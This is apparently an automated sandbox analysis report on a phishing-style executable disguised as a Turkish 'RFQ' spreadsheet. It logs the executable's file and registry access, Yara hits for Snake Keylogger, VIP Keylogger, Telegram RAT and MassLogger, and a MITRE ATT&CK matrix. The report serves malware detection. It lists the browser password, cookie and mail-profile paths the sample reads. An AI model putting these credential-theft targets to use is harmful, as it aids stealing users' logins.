Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Users\user\AppData\Roaming\qovDEn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Users\user\AppData\Roaming\qovDEn.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match

File source: 0000000F.00000002.2758770244.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 15.2.qovDEn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 5724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 4068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 2816, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 15.2.qovDEn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 4068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 2816, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\qovDEn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2762742331.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2758777957.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2761770176.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 5724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 4068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 2816, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match

File source: 0000000F.00000002.2758770244.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 15.2.qovDEn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 5724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 4068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 2816, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 15.2.qovDEn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 4068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 2816, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
